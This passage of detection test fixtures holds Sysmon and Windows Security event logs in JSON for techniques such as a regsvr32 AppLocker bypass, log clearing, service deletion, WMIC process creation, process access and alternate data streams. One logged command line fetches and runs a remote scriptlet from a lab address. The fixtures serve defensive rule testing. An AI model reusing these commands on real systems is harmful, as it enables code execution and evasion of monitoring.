"49F1AF32-6417-5A74-0000-002065780100", 58 | "LogonId": "0x00017865", 59 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 60 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 61 | "ParentProcessGuid": "49F1AF32-64C3-5A74-0000-0010122C0900", 62 | "ParentProcessId": "1940", 63 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 64 | "ProcessId": "2688", 65 | "TerminalSessionId": "1", 66 | "User": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "1", 74 | "EventRecordID": "104856", 75 | "Execution": { 76 | "ProcessID": "1376", 77 | "ThreadID": "1964" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "1", 90 | "TimeCreated": { 91 | "SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "5" 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /tests/Regsvr32ApplockerBypass.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Windows\\system32\\regsvr32.exe\" /s /n /u /i:http://192.168.57.2:8080/TGnALEigHGs8.sct scrobj.dll", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Users\\Gen Eric\\", 7 | "Description": "Microsoft(C) Register Server", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=645C424974FBE5FE7A04CAC73F1C23C96E1570B8,MD5=59BCE9F07985F8A4204F4D6554CFF708,SHA256=CA24AEF558647274D019DFB4D7FD1506D84EC278795C30BA53B81BB36130DC57,IMPHASH=84DA4A3165E248148F65DBE03B98A436", 10 | "Image": "C:\\Windows\\System32\\regsvr32.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "49F1AF32-DB3E-5A72-0000-00204F830100", 13 | "LogonId": "0x0001834f", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "49F1AF32-DF5F-5A7A-0000-001028367201", 17 | "ParentProcessId": "1352", 18 | "ProcessGuid": "49F1AF32-DF73-5A7A-0000-0010D2E97201", 19 | "ProcessId": "1444", 20 | "Product": "Microsoft� Windows� Operating System", 21 | "TerminalSessionId": "1", 22 | "User": "GenEric-PC\\Gen Eric", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "5074393", 31 | "Execution": { 32 | "ProcessID": "1312", 33 | "ThreadID": "1884" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/SecurityLogClearing.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "UtcTime": "4242-04-24 13:37:42.422" 5 | }, 6 | "System": { 7 | "Channel": "Security", 8 | "Computer": "BLAHBLAH", 9 | "Correlation": {}, 10 | "EventID": "1102", 11 | "EventRecordID": "1056", 12 | "Execution": { 13 | "ProcessID": "700", 14 | "ThreadID": "1300" 15 | }, 16 | "Keywords": "0x4020000000000000", 17 | "Level": "4", 18 | "Opcode": "0", 19 | "Provider": { 20 | "Guid": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}", 21 | "Name": "Microsoft-Windows-Eventlog" 22 | }, 23 | "Security": { 24 | "UserID": "" 25 | }, 26 | "Task": "104", 27 | "TimeCreated": { 28 | "SystemTime": "4242-04-24 13:37:42.422" 29 | }, 30 | "Version": "0" 31 | } 32 | } 33 | } 34 | { 35 | "Event": { 36 | "EventData": { 37 | "UtcTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "System": { 40 | "Channel": "Security", 41 | "Computer": "BLAHBLAH", 42 | "Correlation": {}, 43 | "EventID": "1102", 44 | "EventRecordID": "1057", 45 | "Execution": { 46 | "ProcessID": "700", 47 | "ThreadID": "1636" 48 | }, 49 | "Keywords": "0x4020000000000000", 50 | "Level": "4", 51 | "Opcode": "0", 52 | "Provider": { 53 | "Guid": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}", 54 | "Name": "Microsoft-Windows-Eventlog" 55 | }, 56 | "Security": { 57 | "UserID": "" 58 | }, 59 | "Task": "104", 60 | "TimeCreated": { 61 | "SystemTime": "4242-04-24 13:37:42.422" 62 | }, 63 | "Version": "0" 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /tests/ServiceDeletion.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "sc.exe delete caldera", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Service Control Manager Configuration Tool", 8 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 9 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 10 | "Image": "C:\\Windows\\System32\\sc.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 15 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 16 | "ParentProcessGuid": "{8C352DC7-3FAC-5AC7-0000-001099BC1300}", 17 | "ParentProcessId": "1636", 18 | "ProcessGuid": "{8C352DC7-3FAC-5AC7-0000-0010ADBE1300}", 19 | "ProcessId": "100", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "242104", 31 | "Execution": { 32 | "ProcessID": "1568", 33 | "ThreadID": "1984" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "sc.exe delete caldera", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Service Control Manager Configuration Tool", 60 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 61 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 62 | "Image": "C:\\Windows\\System32\\sc.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 67 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 68 | "ParentProcessGuid": "{8C352DC7-3FAD-5AC7-0000-001037C31300}", 69 | "ParentProcessId": "2736", 70 | "ProcessGuid": "{8C352DC7-3FAD-5AC7-0000-00104DC51300}", 71 | "ProcessId": "2512", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "242192", 83 | "Execution": { 84 | "ProcessID": "1568", 85 | "ThreadID": "1984" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "sc.exe delete caldera", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "Service Control Manager Configuration Tool", 112 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 113 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 114 | "Image": "C:\\Windows\\System32\\sc.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 119 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 120 | "ParentProcessGuid": "{8C352DC7-3FAF-5AC7-0000-0010D7C91300}", 121 | "ParentProcessId": "1324", 122 | "ProcessGuid": "{8C352DC7-3FAF-5AC7-0000-0010EBCB1300}", 123 | "ProcessId": "2756", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "242284", 135 | "Execution": { 136 | "ProcessID": "1568", 137 | "ThreadID": "1984" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/StopSvchostAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 7 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 8 | "SourceProcessId": "2412", 9 | "SourceThreadId": "3348", 10 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 11 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 12 | "TargetProcessId": "820", 13 | "UtcTime": "4242-04-24 13:37:42.422" 14 | }, 15 | "System": { 16 | "Channel": "Microsoft-Windows-Sysmon/Operational", 17 | "Computer": "BLAHBLAH", 18 | "Correlation": {}, 19 | "EventID": "10", 20 | "EventRecordID": "145999", 21 | "Execution": { 22 | "ProcessID": "1324", 23 | "ThreadID": "1940" 24 | }, 25 | "Keywords": "0x8000000000000000", 26 | "Level": "4", 27 | "Opcode": "0", 28 | "Provider": { 29 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 30 | "Name": "Microsoft-Windows-Sysmon" 31 | }, 32 | "Security": { 33 | "UserID": "S-1-5-18" 34 | }, 35 | "Task": "10", 36 | "TimeCreated": { 37 | "SystemTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "Version": "3" 40 | } 41 | } 42 | } 43 | { 44 | "Event": { 45 | "EventData": { 46 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 47 | "GrantedAccess": "0x1f1fff", 48 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 49 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 50 | "SourceProcessId": "2412", 51 | "SourceThreadId": "3348", 52 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 53 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 54 | "TargetProcessId": "820", 55 | "UtcTime": "4242-04-24 13:37:42.422" 56 | }, 57 | "System": { 58 | "Channel": "Microsoft-Windows-Sysmon/Operational", 59 | "Computer": "BLAHBLAH", 60 | "Correlation": {}, 61 | "EventID": "10", 62 | "EventRecordID": "145999", 63 | "Execution": { 64 | "ProcessID": "1324", 65 | "ThreadID": "1940" 66 | }, 67 | "Keywords": "0x8000000000000000", 68 | "Level": "4", 69 | "Opcode": "0", 70 | "Provider": { 71 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 72 | "Name": "Microsoft-Windows-Sysmon" 73 | }, 74 | "Security": { 75 | "UserID": "S-1-5-18" 76 | }, 77 | "Task": "10", 78 | "TimeCreated": { 79 | "SystemTime": "4242-04-24 13:37:42.422" 80 | }, 81 | "Version": "3" 82 | } 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /tests/SuspWMIC.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Ancestors": "System|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\winlogon.exe|C:\\Windows\\System32\\userinit.exe|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 5 | "CommandLine": "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" process call create C:\\Windows\\System32\\notepad.exe", 6 | "Company": "Microsoft Corporation", 7 | "CurrentDirectory": "\\\\vboxsvr\\test\\Exercises\\notepad-wmi\\", 8 | "Description": "WMI Commandline Utility", 9 | "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)", 10 | "Hashes": "SHA1=CEEA1CA1D843C0CE456E347AFB58286CA60AF848,MD5=29B7D02A3B5F670B5AF2DAF008810863,SHA256=96BEC668680152DF51EC1DE1D5362C64C2ABA1EDA86F9121F517646F5DEC2B72,IMPHASH=2169BDA7AED3E42F1A59C8141542EC0C", 11 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 12 | "ImageSize": "508416", 13 | "IntegrityLevel": "Medium", 14 | "IntegrityTimeout": "false", 15 | "LogonGuid": "{515cd0d1-e1ec-5da6-0000-0020614b0300}", 16 | "LogonId": "0x34b61", 17 | "OriginalFileName": "wmic.exe", 18 | "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 19 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 20 | "ParentIntegrityLevel": "Medium", 21 | "ParentProcessGuid": "{515cd0d1-e23b-5da6-0000-0010605c1400}", 22 | "ParentProcessId": "6944", 23 | "ParentProcessIntegrity": "0", 24 | "ParentUser": "DESKTOP-LJRVE06\\Generic", 25 | "ProcessGuid": "{515cd0d1-e2c6-5da6-0000-0010e18b1900}", 26 | "ProcessId": "2072", 27 | "ProcessIntegrity": "-1", 28 | "Product": "Microsoft® Windows® Operating System", 29 | "RuleName": "", 30 | "Services": "N/A", 31 | "TerminalSessionId": "1", 32 | "User": "DESKTOP-LJRVE06\\Generic", 33 | "UtcTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "System": { 36 | "Channel": "Microsoft-Windows-Sysmon/Operational", 37 | "Computer": "BLAHBLAH", 38 | "Correlation": {}, 39 | "EventID": "1", 40 | "EventRecordID": "11411880", 41 | "Execution": { 42 | "ProcessID": "2132", 43 | "ThreadID": "4820" 44 | }, 45 | "Keywords": "0x8000000000000000", 46 | "Level": "4", 47 | "Opcode": "0", 48 | "Provider": { 49 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 50 | "Name": "Microsoft-Windows-Sysmon" 51 | }, 52 | "Security": { 53 | "UserID": "S-1-5-18" 54 | }, 55 | "Task": "1", 56 | "TimeCreated": { 57 | "SystemTime": "4242-04-24 13:37:42.422" 58 | }, 59 | "Version": "5" 60 | } 61 | } 62 | } 63 | { 64 | "Event": { 65 | "EventData": { 66 | "Ancestors": "System|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\winlogon.exe|C:\\Windows\\System32\\userinit.exe|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe", 67 | "CommandLine": "wmic Process cAlL cReAte \"C:\\Windows\\System32\\notepad.exe\"", 68 | "Company": "Microsoft Corporation", 69 | "CurrentDirectory": "C:\\Windows\\", 70 | "Description": "WMI Commandline Utility", 71 | "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)", 72 | "Hashes": "SHA1=CEEA1CA1D843C0CE456E347AFB58286CA60AF848,MD5=29B7D02A3B5F670B5AF2DAF008810863,SHA256=96BEC668680152DF51EC1DE1D5362C64C2ABA1EDA86F9121F517646F5DEC2B72,IMPHASH=2169BDA7AED3E42F1A59C8141542EC0C", 73 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 74 | "ImageSize": "508416", 75 | "IntegrityLevel": "Medium", 76 | "IntegrityTimeout": "false", 77 | "LogonGuid": "{515cd0d1-e1ec-5da6-0000-0020614b0300}", 78 | "LogonId": "0x34b61", 79 | "OriginalFileName": "wmic.exe", 80 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"\"\\\\VBOXSVR\\test\\Exercises\\notepad-wmi\\start_notepad_wmi.bat\" \"", 81 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 82 | "ParentIntegrityLevel": "Medium", 83 | "ParentProcessGuid": "{515cd0d1-e333-5da6-0000-0010d9bb1a00}", 84 | "ParentProcessId": "1724", 85 | "ParentProcessIntegrity": "0", 86 | "ParentUser": "DESKTOP-LJRVE06\\Generic", 87 | "ProcessGuid": "{515cd0d1-e334-5da6-0000-0010efd71a00}", 88 | "ProcessId": "4240", 89 | "ProcessIntegrity": "0", 90 | "Product": "Microsoft® Windows® Operating System", 91 | "RuleName": "", 92 | "Services": "N/A", 93 | "TerminalSessionId": "1", 94 | "User": "DESKTOP-LJRVE06\\Generic", 95 | "UtcTime": "4242-04-24 13:37:42.422" 96 | }, 97 | "System": { 98 | "Channel": "Microsoft-Windows-Sysmon/Operational", 99 | "Computer": "BLAHBLAH", 100 | "Correlation": {}, 101 | "EventID": "1", 102 | "EventRecordID": "11412272", 103 | "Execution": { 104 | "ProcessID": "2132", 105 | "ThreadID": "4820" 106 | }, 107 | "Keywords": "0x8000000000000000", 108 | "Level": "4", 109 | "Opcode": "0", 110 | "Provider": { 111 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 112 | "Name": "Microsoft-Windows-Sysmon" 113 | }, 114 | "Security": { 115 | "UserID": "S-1-5-18" 116 | }, 117 | "Task": "1", 118 | "TimeCreated": { 119 | "SystemTime": "4242-04-24 13:37:42.422" 120 | }, 121 | "Version": "5" 122 | } 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /tests/SuspWriteAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+2730e|C:\\Windows\\system32\\conhost.exe+1260d|C:\\Windows\\system32\\conhost.exe+12505|C:\\Windows\\system32\\conhost.exe+895c|C:\\Windows\\system32\\conhost.exe+f2e6|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71", 5 | "GrantedAccess": "0x1fffff", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\system32\\fakedevent.exe", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{515cd0d1-4ba0-5d3f-0000-0010ea641d00}", 10 | "SourceProcessId": "872", 11 | "SourceThreadId": "6236", 12 | "SourceUser": "DESKTOP-LJRVE06\\Generic", 13 | "TargetImage": "C:\\Windows\\Explorer.exe", 14 | "TargetIntegrityLevel": "Medium", 15 | "TargetParentProcessGuid": "{515cd0d1-4b9e-5d3f-0000-0010c9221d00}", 16 | "TargetProcessGUID": "{515cd0d1-4ba0-5d3f-0000-001087601d00}", 17 | "TargetProcessId": "4776", 18 | "TargetUser": "DESKTOP-LJRVE06\\Generic", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "10", 26 | "EventRecordID": "7685513", 27 | "Execution": { 28 | "ProcessID": "892", 29 | "ThreadID": "1536" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "10", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "3" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+5157a|C:\\Windows\\system32\\KERNELBASE.dll+d817|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2c0e37|UNKNOWN(000007FF00290A6A)", 53 | "GrantedAccess": "0x1f1fff", 54 | "RuleName": "", 55 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 56 | "SourceIntegrityLevel": "Medium", 57 | "SourceProcessGUID": "{49F1AF32-31E2-5D40-0000-00101A630800}", 58 | "SourceProcessId": "1124", 59 | "SourceThreadId": "2844", 60 | "SourceUser": "GenEric-PC\\Gen Eric", 61 | "TargetImage": "C:\\Windows\\Explorer.EXE", 62 | "TargetIntegrityLevel": "Medium", 63 | "TargetParentProcessGuid": "{49F1AF32-31A5-5D40-0000-0010655D0400}", 64 | "TargetProcessGUID": "{49F1AF32-31A5-5D40-0000-001084750400}", 65 | "TargetProcessId": "1996", 66 | "TargetUser": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "10", 74 | "EventRecordID": "7779909", 75 | "Execution": { 76 | "ProcessID": "1620", 77 | "ThreadID": "1868" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "10", 90 | "TimeCreated": { 91 | "SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "3" 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /tests/SuspiciousADS.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-02-23 13:17:31.176", 5 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 6 | "Image": "C:\\Windows\\system32\\cmd.exe", 7 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 8 | "ProcessId": "2100", 9 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test.txt:malicious.exe", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 16 | "EventID": "15", 17 | "EventRecordID": "1274680", 18 | "Execution": { 19 | "ProcessID": "1408", 20 | "ThreadID": "1652" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "15", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "CreationUtcTime": "2018-02-23 13:21:35.152", 44 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 45 | "Image": "C:\\Windows\\system32\\cmd.exe", 46 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 47 | "ProcessId": "2100", 48 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test2.txt:malicious.exe", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 | "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "15", 56 | "EventRecordID": "1275071", 57 | "Execution": { 58 | "ProcessID": "1408", 59 | "ThreadID": "1652" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "15", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /tests/SuspiciousService.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\commander.exe", 5 | "Company": " ", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": " ", 8 | "FileVersion": "0.0.0.0", 9 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\commander.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": 